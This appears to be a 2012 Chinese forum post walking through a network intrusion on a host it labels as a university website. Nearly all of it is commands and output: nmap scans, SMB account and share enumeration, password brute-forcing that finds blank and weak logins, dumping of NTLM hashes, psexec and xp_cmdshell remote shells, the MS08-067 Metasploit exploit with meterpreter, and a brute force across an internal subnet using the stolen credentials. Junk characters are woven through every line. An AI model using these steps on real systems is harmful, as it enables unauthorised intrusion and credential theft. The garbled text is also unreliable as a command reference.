广西师范网站http://202.103.242.241/7 \+ X/ l7 j7 y: n2 d/ u7 j l
% {8 f3 ~1 g# V3 J! w
root@bt:~# nmap -sS -sV 202.103.242.2417 P0 m, J5 {4 t) r$ B' l( ^
: L" ~/ z+ G2 w5 M, g& T" V6 `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 Y# G, ?2 [. ~
% q' x7 B3 f3 |# v8 b
Nmap scan report for bogon (202.103.242.241)
2 W l V! r$ G# L8 K3 R9 n+ B- X7 r6 X+ X! W e+ {2 ~
Host is up (0.00048s latency).: O" D ?" \7 b6 ]
6 G/ s" M+ B6 _6 n) T2 u( N
Not shown: 993 closed ports
0 ?- Z8 h3 ?7 H K7 @3 f$ Z- c Z& O
PORT STATE SERVICE VERSION
( l" T4 U* i1 V! W( [/ v
6 ?1 V% l: o5 b! e$ Y$ v135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* v1 A. d5 L# F5 p
- T8 {0 R" V; F# `4 ]6 Q/ L- {139/tcp open netbios-ssn
, M! D+ u1 X' Z" d3 x! G7 y& B
! k! I+ |2 `! Z+ u445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
3 M( k6 R. C( }7 u) H. N9 g) ~7 l) Q( c
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 u7 |& _1 E' K
! d5 H- y8 H' ], }2 [
1026/tcp open msrpc Microsoft Windows RPC
: k2 y8 z3 C7 N0 A" h: R/ N) D6 b& X
3372/tcp open msdtc?
, I9 j8 h. o2 J$ `4 X: y: T' }3 J' g k( {2 B* O" u
3389/tcp open ms-term-serv?# y- f0 e+ _6 {- z7 y% w
4 ^/ z7 K' @, a3 D9 O" G! f4 {; R1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
" K$ Z" r- N# I/ lSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r! w$ S# _( r5 Y
4 a* _% u# A% C8 C% _# wSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions1 H: s& o- w3 \
5 R( i; g. o4 P6 ]: h: R& n$ T
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
0 y! q* t# a1 p1 i! ~8 i/ K* b) _ J6 \
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO" y; W2 Z3 v/ w
, s7 B: u- I+ K
SF:ptions,6,”hO\n\x000Z”);" J0 V( v. g7 D% J% E/ i
- N( h8 Z) B8 K8 f$ L9 `( v1 ^
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
; N. b' [4 m: P5 O( |" o: H6 @1 `$ U! D; j. M; o
Service Info: OS: Windows
s6 Q4 ]4 ~0 \+ z: k- K% U
: u T; a w% P- C) JService detection performed. Please report any incorrect results at http://nmap.org/submit/ .+ O; X' j/ T$ C2 E, L
+ h( N/ u7 s2 b" T
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
7 A4 U; K1 N: Q# M0 r: G$ P X! k! \$ ?
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
0 @7 W5 X& u* O
5 l5 g& P4 N/ e4 |' a+ h% K) Y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
, c4 v: X1 G3 f
" d# z+ {' X. K/ g; O7 D5 x$ U& E-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse! s, ^# N% x+ K% V, @
$ N ?1 j) E' B, ^
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse$ d$ i) Z5 w0 N: t& W
* n; @1 ~( C d6 }1 `, E7 i& ~2 N-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse; q7 _. @5 ~2 T, e4 V7 y! D
5 ?5 h5 b) R7 h( B6 l
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
2 m! H0 T# [2 |3 U# t' {& E$ K# m: Q1 \# M! c% ?
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
( {" j! U, R5 f+ K K+ `0 h1 U# q) ~) U$ w
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse/ o' d# ~* U# h( n9 A
6 m7 s! X, j! l7 L: A& Q+ y-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse, A# H( f" [% S" l
$ {- Y9 C7 h ?9 }, G-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
3 Q+ {2 w6 f# ~5 Y( S0 w E1 i) d" ~' O& a3 D3 r
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
3 m6 w" B) Z' C2 p: H
& i% w# @6 j" k6 s( e1 Q) V-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse, h( j) G/ q' I$ i3 K v0 f
% ^* {) }+ p" ?' @' `-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse6 e, ^3 K- L6 G7 _1 m; P0 K
0 Z5 D: A9 Y/ Z i! ?; @
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
/ \ R4 A$ K; i# h2 x% e' o0 x9 b
, O, j! O5 h+ g1 e' ?; J6 W-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
( X% A7 [$ ?+ c2 \$ H4 q# r u8 X
& E' x. D) }7 k) A-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse* g4 M g/ y. n8 M# m. c
! t- b! \0 X! V+ T& Yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 : _- t- N6 n2 }0 f8 a0 N2 _ F1 C
( y+ n( q8 {. h: |& ^' \//此乃使用脚本扫描远程机器所存在的账户名( ?1 b& c0 b* I# ~. u, b6 ?
5 ] S7 S4 {9 [Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
( b, n2 ]5 Q/ b4 R0 q8 C2 U% L* o' o" D, @3 x
Nmap scan report for bogon (202.103.242.241)5 B; P d( ^) Z6 q& I, n
( w+ d) a( z. u, Z/ t. a) {
Host is up (0.00038s latency). |+ W" u# l( l) ~8 o# S0 w
|$ f" O% i/ r, E
Not shown: 993 closed ports5 E# D' V3 z/ `5 G: w2 @/ D
* j" c* H, D% ~4 w* v2 I4 @
PORT STATE SERVICE
8 n. r- {! h3 J. C
- \+ A; ~1 P; n135/tcp open msrpc0 I% y0 X0 ~4 M& a6 d
& M+ e5 e6 e' \' n7 P139/tcp open netbios-ssn
3 l E, m! K8 E
' |2 u1 d; h0 K" V# q, G9 a445/tcp open microsoft-ds/ t( {. R! z2 v C& u
- V! ~" x1 g: c" q0 D- Z1025/tcp open NFS-or-IIS9 k. \) X4 j$ l9 H6 B: D6 Y
5 ~" y) D. {7 s& ^1 h# P
1026/tcp open LSA-or-nterm5 C6 t. K: e8 ^0 q
2 M7 E5 V7 \% E+ ^! @7 d9 O
3372/tcp open msdtc& \7 c, }" `7 U. b/ g
3 A) u2 u. J* `- k3389/tcp open ms-term-serv$ ~. v8 m7 V/ @- F" }: t9 N8 y
|& u6 q& \/ R6 O0 l# |% B+ yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' `% C1 d9 D) r! T) F/ B3 E" @) w' A
7 V% V: j8 h! `4 f j5 f7 G$ I2 J) IHost script results:: R8 \, {9 }2 b8 d
6 h9 M/ L* I: p+ w$ b
| smb-enum-users:
* h7 W4 G" M1 e' f& w G
6 m) p2 T. O3 Q: {& W& C# m|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
- ]5 \/ @- e0 ^3 a: p! T4 g& l; C8 q. ^7 q. T* m5 j
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds8 S5 q; T# Q* |. z9 e2 G
* E; ^; B( d" X$ w2 {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
' W; }# Q( ^5 ?
. J& e- ]. J6 |- g% Q% W//查看共享2 A# J/ y6 t, v
Q4 c. z# @" P. z8 z# G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Z2 F6 h$ s8 ]4 f2 I3 U8 _) T' `) e) f4 A/ H; K6 j' b
Nmap scan report for bogon (202.103.242.241)( u6 t( N. I: ~. n3 I
I$ K( V, z% y4 j0 o2 @6 ~Host is up (0.00035s latency).4 J4 d% t' X& Q" Y) ~& m, C
! Z* ^( v' i6 u: H* ~Not shown: 993 closed ports, \' `, o7 k5 b3 d- G. H- z
5 Z7 `' [+ y( U- }) p3 ~
PORT STATE SERVICE
5 ?4 |& \* Y8 Q G* ~3 d# G) }8 a
/ C2 X: |) d0 Z1 R# m+ B2 N135/tcp open msrpc$ g" R' ^4 }" K. H9 ?" s: c1 V) t
. J' y( q' F* g' F; g; \
139/tcp open netbios-ssn. [8 k& p: G! N; Y# |7 E
( Q( L; G# p" e/ R445/tcp open microsoft-ds
( |+ P a) i3 r d5 L. b# ~2 r9 @9 z( F- J, I# ^$ |9 r) Z* Z
1025/tcp open NFS-or-IIS W5 P" Y; b: X; _
, a& ^- ^% Q/ X& E; x: h
1026/tcp open LSA-or-nterm j- G9 f4 v" u& h4 l
$ W7 b6 B" C/ i0 G/ @4 r3 \3372/tcp open msdtc
' J! U+ S0 p* i! ~ Q6 R9 K" j
l7 M' f+ u+ P, p7 d9 Y& Y3389/tcp open ms-term-serv
) h9 h7 D; ~ C( d' X" {& z) i* i% B$ a: T% m
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 Q% i* e7 ]$ {3 @# Z1 x8 J/ o2 V0 I* g
/ w: h$ y1 o+ m8 `3 W/ I0 B5 E4 YHost script results:
% Q, X L( z* u9 C6 I* [
8 ^8 K4 h! R/ y9 _8 M| smb-enum-shares:% ]% `# p$ y- ^5 @0 a; X% {
/ o( J" C+ e% ?- e5 A# l| ADMIN$
' q: j$ B' p' P& L7 C: S6 \% k- d. M% r' ]5 P. P8 ~# F
| Anonymous access: <none>( {; I3 b# ]' b: t5 a
" T& M# J, ~* c9 K/ C
| C$
; K8 X- N2 v* H; ~- k7 ~
6 [* h* ~6 Q4 T3 H* ?| Anonymous access: <none>
, b: D( l6 v" G E/ R: c* V* d F: d" {9 O0 n* C3 F' I
| IPC$5 w. R6 ^" e/ [) i- ?( {8 U
2 F+ L: `2 O3 q, C& e
|_ Anonymous access: READ4 F; s: P: ^8 x% w& D# C
, d; t! I$ M5 N/ {Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
* V9 ^5 V" |' M/ j: H( c, Z9 M
* ~1 R% }) J# n) c* U! mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 : k- z. M4 d( W O& w' V0 U
) k- ~% H$ E6 k! V6 f: K
//获取用户密码+ d4 `7 ?' \7 z, i( a
! Q, q- \8 i; n- n. y0 L: [9 r+ ~- D* B
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
- s E2 p8 } ~( r
% x- b) [9 I9 X6 N, w4 BNmap scan report for bogon (202.103.242.2418)+ j. \1 r$ U/ a! s, P' K' |% y
6 b0 P7 X, |# r% d) @/ U& cHost is up (0.00041s latency).0 ~; ^* ~) R( a& K8 P0 n
: c! P; m, R9 f% I& dNot shown: 993 closed ports
1 p C6 ?+ B/ v7 c
$ ]2 I, s: f' q0 V. q5 V. i# {0 QPORT STATE SERVICE/ v( C) B4 [* J
2 K! \( z; T) a% _# f, }* Z
135/tcp open msrpc
7 s1 p+ S, b* |, R$ [
# h8 A# _) s! x. o2 {5 q" o& i139/tcp open netbios-ssn
& C9 F b4 X' y# p6 M6 J1 u
# x$ V& v- U' @! v; a7 I& P445/tcp open microsoft-ds; h, h" i* P1 q, [( N/ K
6 W0 K4 T j0 W: F% J* \
1025/tcp open NFS-or-IIS
- G) z, u6 ^6 R
7 }% |8 I5 m9 J5 r3 i2 W. f1026/tcp open LSA-or-nterm
: { P: v0 y! r; a. t& u( e( [2 P1 j* x/ z" ?
3372/tcp open msdtc
9 Y3 T6 \5 j0 V8 Z
' T3 `" l4 R1 [; x) w* t3 G3389/tcp open ms-term-serv
' w n. z1 Y. f, F4 \" _' H8 X6 O
5 J$ q+ i* ^3 Q) s2 PMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 I: T% m# v1 E
& m1 v( d( E8 [7 X8 R9 bHost script results:* ~" N/ o. j: y: C' k
$ j D9 D' y: d+ j# C
| smb-brute:, T& N$ {; C5 D3 A
y: a- G# \, D) }8 U" r
administrator:<blank> => Login was successful' u5 m! k- X+ K0 {1 ~
( G& U2 P: I* N ?
|_ test:123456 => Login was successful* u( O. w* Q& q! O6 @
' @: F0 J! G' D1 }, @
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds: r' ]6 p9 r7 p4 J# g. k$ E0 {4 Q2 u
- O( k3 j, O6 R3 S4 J4 Wroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
" S) i& U' T7 B) w w' ?( u! Q* E1 F ^$ ~4 X6 M, W
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data8 V, S8 S+ _6 Z' F! Y6 W" i
; ^) J. r1 [/ A- @
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
# w1 r0 A+ U4 @& ?: e& R- J5 X$ y6 j# h: z+ `
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139/ ~7 ^, s9 {. Y5 z2 B0 Q3 p
8 O; Y6 I" i* z7 b- M ^& i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
+ C3 R4 [! f6 {1 e
6 X. c E) b2 T* [) l; tNmap scan report for bogon (202.103.242.241)( n. ]: n6 }) v/ |
! J6 K/ A u* e( w, ]7 h# z7 Y" V2 |Host is up (0.0012s latency).
& J d. R; F* U- [# E3 n' L, G2 H5 |) o, F( o l+ p
PORT STATE SERVICE5 Q2 r$ M/ z) b$ }
" @6 m4 M1 w- t135/tcp open msrpc X( L+ J4 D1 M6 P
% J7 t! \3 u. N' X
139/tcp open netbios-ssn0 V9 \3 m2 B, K( l M
1 ^( A9 N3 r( {
445/tcp open microsoft-ds- {( O" p1 W1 n' ]- A
0 t9 i9 {. W1 s. j& U% {' g# k& {6 a" [
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 M7 Q2 G( W0 D+ R
& n7 D" m. ~( E: q' y
Host script results:9 g$ |/ b0 A# O) q( G3 j1 n5 X5 P+ I9 k" P
: e8 ]$ G; y- l0 ?( i
| smb-pwdump:6 i l' e# j" A0 K& t' E4 N
2 u, g/ X" E% E ]5 E3 Z+ T4 A$ P| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 L: m5 g# Y2 h6 X2 p
: k# \2 V( C7 m
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************9 L' W, w6 U1 j4 q1 |/ }% ]
8 T9 I s, R1 m
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4: f3 W1 }) s8 P8 L% W: B
3 `/ K) O1 `0 g, Z$ l|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D28 w O Z3 B) }& Q/ z6 |
9 L5 K1 n, U1 y, q. jNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
+ E5 F( O. z W
, g r" [) [! i' @1 @- k) D' k' OC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell! B: [* F) ]- a7 r9 N- ?$ j# q
; S, ^# ]2 m% Z' g9 v$ V2 S
-p 123456 -e cmd.exe
! ~4 I/ j# `1 y& \/ @9 p8 L& z) R* N- d
3 g7 \& Y7 l5 x# p Q9 pPsExec v1.55 – Execute processes remotely# I3 _6 f( A9 Z, b5 g0 L5 y5 F, x
4 K7 l9 K$ N% d9 L' ]5 fCopyright (C) 2001-2004 Mark Russinovich
' {4 f: r4 E0 t) U8 [: u3 ?; J7 |5 Z( L6 T4 @0 ]% M6 d Y' m
Sysinternals – www.sysinternals.com
2 g8 `0 |. }" ^5 L$ H: v0 `* l
5 s+ ~3 s }' f! rMicrosoft Windows 2000 [Version 5.00.2195]& c7 Z- e! n) w* t) p; p! V3 _4 t$ K
9 J9 a; { L: b+ A# J" j/ ^% q/ J5 c(C) 版权所有 1985-2000 Microsoft Corp.7 A' [; A& ~" U/ G, x; \
' s6 Z% |% N: e& kC:\WINNT\system32>ipconfig" l; L" R( H) f: g
6 y# @/ g) d1 W3 Z* S# i" h$ H
Windows 2000 IP Configuration7 z) H$ j" M9 Z) h; c4 ^6 Z
. x* g& g7 R$ X8 c8 ^, w9 [1 [Ethernet adapter 本地连接:
2 j0 J& I" i6 g) J
9 X$ b& d- _9 kConnection-specific DNS Suffix . :1 `- V/ M& d- \, W+ o
; z! Q8 s* G, e, L0 \6 R5 xIP Address. . . . . . . . . . . . : 202.103.242.241
# Z6 z1 i7 Y5 j R+ g2 N% n/ n' }, L9 y, w; b
Subnet Mask . . . . . . . . . . . : 255.255.255.0
& H1 @ q8 \# Y
( ~! N+ M0 f3 Q+ N. s3 ZDefault Gateway . . . . . . . . . : 202.103.1.1' [! k& J0 N* X) Y( l1 |4 ^: f
D) y' O% Q" _. W |6 u% _3 p
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
* m/ p5 [2 s- Y/ A* l/ b9 ~0 P
# o0 E. s: ]8 o1 {root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞) O" d/ K, h* ^
0 ^8 s [4 B- ] Q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
0 e6 V4 f: d5 k. ]! b" I8 q% N2 s2 z+ [ W2 O9 o% N. V2 w, h
Nmap scan report for bogon (202.103.242.241)
3 B- ]* P5 E6 ~. z- X$ G/ s/ X: e* A* A( z
Host is up (0.00046s latency).
# M% o+ q5 j( Z. i
* T; H4 I0 j0 C$ u0 O: JNot shown: 993 closed ports
! n2 d, D( J9 J! b& r9 S
, V1 h5 Z: _6 @4 Q6 W# N Z# GPORT STATE SERVICE
3 r. k5 E/ I. x( e- J. b9 o8 ? w0 W
135/tcp open msrpc. _( e! E! P7 b4 K4 h* b' A
% z" X0 ~; I+ b7 F* n
139/tcp open netbios-ssn0 d* c( L# m- [5 j" B9 ]' B$ e" b
. ?' `' J% F) v& G; i$ I- [5 \
445/tcp open microsoft-ds
" e5 e/ H" _- h" J; L2 |- b+ F I6 a3 ]+ u7 v( o) L
1025/tcp open NFS-or-IIS
! M* e5 B& A6 d" {; W/ S
3 U* \) F/ U. H0 U8 n3 Y9 H1026/tcp open LSA-or-nterm0 q. ^) j/ N3 i S6 x" e+ d( Y
: Q( t ^3 s+ P
3372/tcp open msdtc
% I& K+ n0 q9 ?! ]$ d7 d8 A
0 k% ?# J0 J7 ~8 Q3 M4 |1 X3389/tcp open ms-term-serv8 v5 ]) x" C7 v0 C( N( G
: o* U( T! c L" p& L3 FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 D( F; D9 e" |/ T
# i+ L( v3 V6 T& L
Host script results:) P8 D* p t) S- E5 q+ p
% ?- m0 N7 U0 D$ E6 A' T8 x1 [1 E/ n
| smb-check-vulns:
* B' _ H/ H; n
- j( x, p. C2 I( j+ L( F9 c|_ MS08-067: VULNERABLE
# G( U- N" q7 n
* F! b' E' B2 K3 x5 h& VNmap done: 1 IP address (1 host up) scanned in 1.43 seconds$ ^8 V8 f1 r( o# h
: F' g0 t! N/ F2 F4 croot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出2 \( B( L1 K4 v) F! e" S
4 r. ~/ n+ ?3 y" Z+ | D% Ymsf > search ms08
+ y" p/ h2 U- w8 ^, R' H5 o
" @- i5 y& Q8 Z* B' \% `6 Fmsf > use exploit/windows/smb/ms08_067_netapi, S4 ^2 r$ ?& P. [, U! @/ Q
: }: Z+ e# K& {. H, G
msf exploit(ms08_067_netapi) > show options1 r5 g; D! \/ d! A0 w
: [5 U/ {8 d/ |" \/ Xmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2419 k* j( d! g) Y7 p7 B9 I
' }5 m# T/ M& j" ?3 s- d4 e( \msf exploit(ms08_067_netapi) > show payloads
9 Y9 ^" r# E* r7 P/ b. m: Y: n$ ~" z& H
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- V1 O7 l: u5 `; v
& k% y5 T/ F! d2 E9 I2 ]. P& kmsf exploit(ms08_067_netapi) > exploit+ z4 j& s, g: k `' s6 ?! a! o
; A& K. E! G" a1 i5 S
meterpreter >% ~, w E/ `) G
! f7 [% c# U0 F* |5 a2 GBackground session 2? [y/N] (ctrl+z)
# n, _5 j0 T# m+ x5 s @4 K4 A; V
msf exploit(ms08_067_netapi) > sessions -l
- Z3 S. D/ t" t9 `* C# @
+ ^. g+ ^3 r& }5 b! G; d( Hroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt" L9 |- K# R8 t d
3 v1 d' u- F6 s( u" r
test
; H2 N5 n$ ?6 p/ w7 ~) C# }
/ s! W) J3 D# C7 n( d& O% Uadministrator# U# r+ x- Q1 W' s
) d! n! }& C+ z$ ^0 x
root@bt:/usr/local/share/nmap/scripts# vim password.txt0 G. b& n* f* P* P; a: B
, D# Z# g. j R, `% t) V. e! Z0 a44EFCE164AB921CAAAD3B435B51404EE2 \; X# i/ b9 T8 C5 j8 {! ?
" | s8 A; V8 A; i. s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 D/ d( J5 ~! O% A
. v" ]) U C, G. p3 S* L2 m/ J! Q- j //利用用户名跟获取的hash尝试对整段内网进行登录" c) v8 G. E# b h! D
/ v+ w# X3 j7 A' ~' ^
Nmap scan report for 192.168.1.105* _# W7 C* K, T0 S
/ l6 J& D: K, z& d2 F {) X) oHost is up (0.00088s latency).9 W- G: M9 k, n
5 y2 N1 ~0 j3 t- R/ _Not shown: 993 closed ports
* Y: b6 } H: k$ S6 P0 h, W
: U: G8 ~" \! \2 K8 h. C$ O" {2 XPORT STATE SERVICE
2 t, V1 q0 I2 v% o1 {# c& B2 g* L! _3 ]3 _% L: w5 y2 a! I
135/tcp open msrpc
' C) P: w$ G2 K2 V, D6 k- b) I: B1 v, e8 i: `( a6 V
139/tcp open netbios-ssn# ?$ ~9 E) D/ e3 ~* q1 U
3 y# W: L: M |' @; a& y3 u445/tcp open microsoft-ds( f) b2 s6 S: f: a. u9 f# w
' ?/ \) y, H; l, S# t( A, Z1025/tcp open NFS-or-IIS" m" Y* L! b% C8 `, ] n
9 P: c k% O5 {0 `
1026/tcp open LSA-or-nterm
. E0 O2 C* W+ h- \2 T
, {5 ^$ u5 R4 Y/ x; Z: w3372/tcp open msdtc8 I& y9 j! E' g6 r' A5 I, W
8 o/ G8 k$ Q+ H
3389/tcp open ms-term-serv# w$ Z/ q, ]5 K7 b9 e2 e( X
- h$ C5 Q4 N5 J& I9 w
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ D. T m( B' b- x1 u7 ~ s1 b: b5 V: w+ `" P9 ^- `3 J
Host script results:
7 N/ M3 w/ V d; E0 I2 t0 u; ~8 {. P: d7 J3 @) C
| smb-brute:6 ?# F0 o6 H$ W O9 [4 L. O# m0 G: h8 E
) W5 t5 l' q2 J2 c
|_ administrator:<blank> => Login was successful C( f, U& T. u; Q, h. o
. s. I- ~! P" z: ]8 g, E: @攻击成功,一个简单的msf+nmap攻击~~·
( l- t! Y1 u# N) Y
1 ^7 F! o# s6 x& ]- j3 l |
发表于 2012-12-4 12:46:42
收藏
支持
反对